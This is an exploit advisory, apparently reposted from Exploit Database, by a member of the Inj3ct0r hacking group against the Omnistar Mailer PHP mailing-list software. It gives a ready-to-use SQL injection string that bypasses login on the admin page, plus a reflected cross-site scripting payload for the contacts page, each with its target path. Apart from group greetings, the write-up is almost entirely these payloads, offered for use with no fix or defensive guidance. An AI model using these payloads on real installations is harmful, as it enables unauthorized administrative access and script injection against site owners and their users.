Omnistar Mailer – Multiple Vulnerabilities

• Exploit Database
• 11 阅读

• 作者： Sid3^effects
  日期： 2011-08-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17741/

• 1 ########################################## 1
  0 I'm Sid3^effects member from Inj3ct0r Team 1
  1 ########################################## 0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  
  Name : Omnistar Mailer SQLi Vulnerability
  Date : june, 21 2010
  Critical Level : HIGH
  Vendor Url : http://www.omnistarmailer.com/
  Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
  special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
  greetz to :www.topsecure.net ,All ICW members and my friends luv y0 guyz
  #######################################################################################################
  Description:
  Are you a business and your are looking to increase your profit? Omnistar mailing list software will allow you to send campaigns and professional html emails to your customers and potential customers in no time at all.
  #######################################################################################################
  Xploit:AUTH BYPASS Vulnerability
  
  USE' or 1=1 or ''='in both username and password and you are in
  
  DEMO URL
  http://server/mailerd4/admin/index.php
  
  ###############################################################################################################
  Xploit:XSS Vulnerability
  
  Attack pattern :"><script>alert("Sid3^effects")</script>
  demo url :http://server/mailerd4/admin/contacts.php?op=[xss]
  
  ###############################################################################################################
  # 0day no more
  # Sid3^effects